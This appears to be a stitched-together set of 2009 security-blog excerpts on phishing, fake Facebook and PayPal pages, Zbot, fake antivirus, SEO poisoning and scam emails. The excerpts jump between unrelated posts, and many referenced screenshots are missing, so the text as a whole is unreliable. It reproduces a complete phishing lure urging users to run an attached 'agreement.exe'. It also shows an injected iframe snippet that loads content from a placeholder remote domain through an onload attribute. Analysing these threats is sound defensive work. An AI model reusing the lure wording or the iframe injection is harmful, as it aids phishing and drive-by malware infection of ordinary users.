Dear Facebook user,

Due to Facebook policy changes, all Facebook users must submit a new, updated account agreement, regardless of their original account start date.
Accounts that do not submit the updated account agreement by the deadline will have restricted.

Please unzip the attached file and run “agreement.exe” by double-clicking it.

Thanks,
The Facebook Team

Of course we all know that it is pure folly to unzip and run an unknown executable attached to an e-mail, however the implied threat of finding their access to Facebook restricted by ‘the deadline’, whenever that may be, is obviously severe enough to panic a number of the users of Facebook into falling for this trick.  

They really should think twice, by agreeing to install agreement.exe they will install a Trojan.

Sophos detects this threat as Troj/Dloadr-CWS.

It is not hard to spot that this email is a phish since clicking on the link does not take us to PayPal.com but to some remote site (which is already blocked by Sophos’s web appliance).

The web page loaded from this site disguises itself as PayPal.com as shown below.

However, this web page is just an image of the real PayPal.com web page. All the tabs and links on this fake web page can not be selected and only the email address and password text field can be used. This is another obvious sign that the web site is fake. By logging in with some fake  email address and password we were lead to the following page.

By clicking on the link we were directed to another web page as shown below.

How can we tell that this web page is fake? It is quite simple, this page has the following URL.

We  provided some fake  account and address information, the site then redirects  us to a page asking us to supply our banking details.

We then decided to supply more fake banking information to the web page and see where it will lead us. As a result we were lead to the following page.

Finally, the site will refresh and redirect us to the genuine PayPal.com web page.

From my point of view this is malware. Why?

1. The warning screen isn’t  multi-lingual if English isn’t your first language you will still recognize ‘PRESS ANY KEY TO CONTINUE’.
2. Even if English is your first language a child looking for games on the computer will not read the warning but press through to the game.



3. Would our corporate customers want this on their networks?

The concept behind OSX/LoseGame-A is ill conceived and it is likely to have malicious consequences not considered by the author.

However, malware can also be found in links provided within e-mails:

According to its name,  “You have won!.pdf”, it suggests to people that they have won some kind of a lottery.  However,  the URLs lead you to a malicious file, which seems to have been taken down (access to which is already blocked by Sophos’s web appliance).

So, please beware of such malicious links and their fake claims that you have won some money ;-).

If you are curious of what you did win, you can always click on the link and win yourself a piece of malware ;-).

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, thoughts of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they’re shown with a fake Facebook login page:

Victims who have entered their facebook login would get their account details phished, probably for the purpose of spreading more malware. Since this is not a real facebook page, any random login info would bring you to this next page:

It is on this page where the malware author provides an executable for download. This file, updatetool.exe is a Zbot executable that is proactive detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be real careful when reading messages, whether it’s in an email or from a social network. Avoid clicking links directly, manually type the address to access the site, and not executing files would do a lot in protecting one’s computer.

Looking at the latter part of the month from the 21st (when the detection was published) onwards.

Mal/Iframe-N is clearly first and if the results are extrapolated for the whole month Mal/Iframe-N should have easily beat Mal/Iframe-F into second place!

Late last week, I downloaded:

• 2819 infected URIs infected with Mal/Iframe-N
• hosted on 2294 different domains
• with 163 different TLDs including:

.edu.in
.edu.tr
.edu.tw
.edu.ua
.ej.am
.eng.br
.es
.eu
.fi
.fr
.fr.cr
.ge
.go.th
.gov.br
.gov.pk
.gov.tr
.gr

I have had a few correspondences with other security researchers regarding this threat (see iframes are EVIL! Hate Zeus!) particularly with Unmask Parasites who has gone into more details of this type of threat (see 1, 2) who like me originally thought that the ‘onload’ attribute wasn’t legal in an iframe. Two things changed my mind:

1. Visiting an infected site on a goat machine.
2. The number of infected sites (>40, 000).

In someways the second fact is more persuasive as malware authors don’t tend do things for no reason.

It appears that this Halloween the malware writers preferred choice of infection vector is by using SEO (Search Engine Optimization) techniques to poison popular search terms.

We at SophosLabs have seen relatively few email campaigns that exploit Halloween this year, but there have been plenty of campaigns pushing malware loaded URL’s into festive search terms.

We have various Fake AV families featuring highly:

and

Which leads to the familiar:

and

There are also families that pose as fake media codecs exploiting Halloween to push their wares:

As users wise up to the dangers of email attachments we are seeing SEO poisoning becoming a more and more popular attack vector.

Sophos detects this years nightmares variously as Mal/FakeAvJs-A, Mal/Krap-A and Mal/EncPk-LH.

“I lost 25lbs using this ”
“whoa this works. i feel good and look good ”
“lol it’s amazing. look and feel great with ”

When a user clicked on the link, it redirected you to this site:

All you had to do to get your “free” bottle was fill out your name, address, phone number and email. However, once you submitted that, you then get to the screen to input your billing information and input your credit card details. Why do you need to input credit card details for something that’s free? With all that information, the cybercrooks have more than enough info to commit identity theft and fraud on your card. They have your name, address, card info and you’ve even confirmed that the address you gave is the billing address too.

At the risk of sounding preachy, these pills never work. They only thing that gets “slimmer” is your wallet.

I followed the link and it went to a fake YouTube page with the following text.

“This video or group may contain content that is inappropriate for some users, as flagged by YouTube’s user community. To view this video or group, please verify you are 18 or older with your cell phone”

Huh?

How does that prove anything to do with your age? I know parents who have given their young children cell phones. I’m guessing this is a great scam to get legitimate phone numbers for those “market affiliates” that call to try to sell you “long term auto insurance” and other such scams.

Definitely more tricks than treats today on Twitter.

“hi. this you on here? http://blogger.djh****.com”

The good news is if you do a search on Twitter, you’ll have a hard time finding an example of the original message since there’s an overwhelming number of people tweeting to their friends warning them about this campaign. Slowly but surely, people are learning to be more cautious.

Interested to download and try this anonymising email doohickey if you’d ever chance upon it?

If you’ve just said “Yes”, you’ve just agreed to installing a Trojan on your computer (detected by Sophos as Troj/Pasta-B).

After filling in the details and hitting the “Send” button, it appears to do what it say. A network packet trace reveals that the application does indeed perform a HTTP Post message to a server located at a Russian pornographic website(?).

Given that this application appears to have originated from Russia, I tried accessing the Russian Google website and was surprised to find that my computer was now as slow as molasses in January. What gives?

Unbeknownst to the user, while the Trojan was “chewing fat” with the remote server, it was also cooking something up and was as busy as popcorn on a skillet. It secretly modifies your HOSTS file, thereby preventing access/redirecting access to several websites (shown below).

And if you happen to be infected by this Trojan, there’s no point in crying over spilt milk or going bananas. Contact your anti-virus vendor and see if there might be a way to resolve your situation. Your vendor might already have a ready fix available.

Always update your anti-virus software and perform regular updates to your operating system and software. I know the taste of forbidden fruit always seems enticing at first but do refrain from making impulsive decisions. Avoid half-baked applications as you’ll never know when you would end up with egg on your face. Know which side your bread is buttered.

And remember, there is no such thing as a free lunch.

If an application seems even remotely suspicious, it is preferable to err on the side of caution. If it comes from an unknown source, drop it like a hot potato. I prefer my life to be one of a bowl of cherries than to one of eating humble pie all the time.

PS: I think I’ve been watching too many Masterchef/TopChef episodes… I really need to lay off the sauce. Back to the “salt” mines… :-)

Usually it manages to penetrate into a user’s computer via a small downloader. Once installed, it will attempt to download further components associated with this malware. After a few minutes, it starts to display warnings about “Privacy alert! - Your system was found to be infected with intercepting programs…”

It displays a main window and offers to provide “the scan now” option and when activated, it detects non-existent malware.  These non-existent malware can range from scripts to rootkits.

Let’s look quickly at what exactly it could find. Usually, it reports about 10-20 different malware files in the Windows System folder.  We now open one of these detected files and find out what they actually are.

; "zekel.dll":
0000:  00 00 00 02 00 00 01 04  01 04 00 06 06 01 0B 03
0010:  04 0A 08 0B 01 14 0C 01  10 01 13 02 11 1C 04 04
0020:  0F 1D 20 04 15 10 20 0D  1B 20 1F 09 17 24 00 19
0030:  2B 10 02 22 1C 17 13 1F  1A 23 17 13 14 2D 21 2C
0040:  0F 35 0C 19 2E 15 30 30  44 01 0C 13 37 1B 19 2F
...
00F0:  CF AC 00 15 09 E2 6D AF  D6 B7 17 AC 9F F9 C1 28
0100:  AD E8 A3 6C 03 3C 90 40  01 87 D0 AD 92 2F 63 0C
0110:  C4 A6 9A D4 B2 E9 6B 27  E9 05 E6 6B 43 5D C2 72
0120:  84 8C D9 A4 FB 98 17 EC  09 13 27 6B 75 14 D0 3A
0130:  25 05 26 53 78 BA 05 07  2A 12 DB 2F 15 61 E2 41
...
3940:  1E 53 D9 F2 EA 74 95 1B  F8 1C 02 10 23 EE 84 BF
3950:  F3 BD F7 95 37 ; EndOfFile

Despite it’s somewhat wacky name the file “zekel.dll” is not a DLL (Dynamic Link Library) at all. It is a mostly junk file filled with random bytes.

At the first glance it is possible to notice some regularities in these “malicious” files.  For example, all files have nulls as their first and second bytes. The new few bytes - for example at offsets 0x02..0x0F seem quite small (always less than 0x0F). What about the next few bytes? - they also appear to be “limited” - for example, the bytes at offsets 0x10..0x1F are never more than 0x1F, but at the same time they look quite random.

If we scrutinize these bytes from the start of file, we can derive some approximate formula (C-notation):

for (int FilePos=0; FilePos<FileSize; FilePos++)
{
  unsigned char b= rand()%FilePos;
  write(h,&b,1);
}

We check this assumption by analysis of the real code implementation of “AntiVirus 2010.” We need to intercept the moment when it starts to open and write to these files and decide it is “malware”.

; Inside the "AntiVirus Pro 2010" - algorithm of "fake malware" generation

From the code, it appears that I was correct about how these fake detected files are created. :-)

As a final note, there were no checksums or datastamps… only random junk inside the fake threats of “AntiVirus Pro 2010″.

This JavaScript is non-malicious and will neuter Iframes on a page similar to the Defensive Iframing. It appears that a malware writing team is targeting iframes and Zeus (aka ZBot). Is this the same team as those behind Bredo? Or is there a new Web-based grouping?

But who wants to share? We have seen bots go toe-to-toe with one another before; embedding logic into their armory to block or disable other malware. As such, it comes as no surprise to have seen a recent Bredo sample with additional code to disable installed Zbots. The sample loops through the list of known Zbot executable names…

… and moves any files found to an alternate location, and thus disabling Zbot’s path-based auto-start mechanism for subsequent reboots. And to combat its own paranoia, the malware sets up a thread to perform this check (along with its own installation logic) forever.

Though disabling Zbots may seem helpful, Bredo malware does far more harm than good. As prevention is often better than the cure, be diligent in your efforts to avoid infection altogether; read e-mail with extra caution and follow safe-computing best-practices.

Even though this site is effectively down for improvement there is still an infection!

I thought that I would take some time explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, malicious Iframe’s have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn’t a direct src= they use onload= like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes is currently appending them to the end of legitimate HTML.

         Update for Microsoft Outlook / Outlook Express (KB910721)

Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan? 

The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’  rather than an attached executable.     

The details have also been updated:

   Quick Details

         * File Name: officexp-KB910721-FullFile-ENU.exe
         * Version: 1.5
         * Date Published: Wed, 21 Oct 2009 16:05:06 +0100
         * Language: English
          * File Size: 100 KB

Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan.  Encore une fois.

The advice from Sophos remains the same.  Visit the genuine Microsoft update site in order to obtain your fixes.

From the description of the hack I would have expected Sophos to have been detecting the site as Mal/Iframe-F. Naturally, I visited the site, in a secure manner, to see what I could see. Unfortunately, I didn’t see an Iframe as described.

What I did see was a heavily obfuscated script injected into the page that references an iframe. A quick analysis of the obfuscated script revealed that it adds an iframe to the page to load content from a remote site (blacklisted for Sophos customers since Oct 7th). The WHOIS record that remote site strangely says:

Address : 56/2 Sun str.
City : Dallas
Province/State : beijing


This morning I wrote detection for the obfuscated script, as Troj/Iframe-DD.

After further digging on our systems we have seen multiple infections on this site:

• Mal/Badsrc-A first seen 2009-10-15
• Mal/iframe-F first seen 2009-08-05

How long has the site been infected? and how many infections will it have before the sites security is updated?

Amongst the many new features is the introduction of data loss prevention (DLP) functionality. This helps administrators protect against accidental loss of sensitive information.

The idea is simple really, SophosLabs provide a set of content control lists (CCLs) that identify different types of sensitive information, email addresses, credit card details, social security numbers etc, and administrators can create rules that prevent (for example) such data being uploaded to web browsers, or copied onto unencrypted USB keys. All brilliantly simple.

Great stuff, and a departure from what SophosLabs normally do. Well actually no. We’ve been doing this for the past 20 years!

Think about it for a moment. Traditional ‘anti-virus’ looked for signatures or patterns in files to identify them as malware. The techniques have moved on from the early days but in it’s most basic form it involves looking for things inside a wide variety of file formats and identify characteristics or combinations of characteristics.

The CCLs we are producing are basically doing the same task, it’s only the management that has changed. When a Word document is opened it gets scanned, the various streams within the file are examined looking for macro’s. Why not look for sensitive information at the same time. Obvious really.
This is just another extension of what we do, just like Application Control (generically identifying particular applications) we use the same skills and techniques.

There’s more to come, we may have just released the new version, but we are already working hard on the next pieces to the jigsaw.

To help everyone pickup or improve their Afriglish, I have a few pointers from scam emails to get everyone started.

1. Installment is spelled install-mental.
But, due to Western Union transfer rules, you will be entitled to $10.000.00 install-mental payment every day till the above mentioned fund is completely paid off.

2. Introduce yourself with an opening that will not take much time
Without taking much of your time, my name is Sir. Ogbonna O. Onovo the Inspector General of Police Force (NPF) of the Federal Republic of Nigeria.

3. Avoid using -ing, e.g. I have a stomachache after all the eats.
Please do let me know immediately you receive it so that we can share the joy after all the suffers at that time.

4. Replace ‘Are you’ with ‘Should you be’
Should you be interested? Please send the following information this emeil address: example@example.kk

5. Reinforce the ‘obvious’.
Attn: Friend, It is obvious that this proposal will come to you as a surprise.

With the above tips, a hot date with your dream mate is imminent. Should she/he be charmed?

This version looks like this:

Subject: FedEx Tracking N5421062126

Date: Tue, 20 Oct 2009 08:44:11 +0100

Unfortunately we were not able to deliver postal package you sent on October the 18st in time because the recipient’s address is not correct. Please print out the invoice copy attached and collect the package at our office.

Your UPS

Interestingly the wording is exactly the same as it was more than a year back. The only difference (besides the date) is the attached malware. This one carries Mal/EncPk-KP, containing the most recent incarnation of fake anti-virus.

Unfortunately I am quite certain this is not the end of FedEx/UPS scams. As always please be very careful with emails like these and never click on the attachment.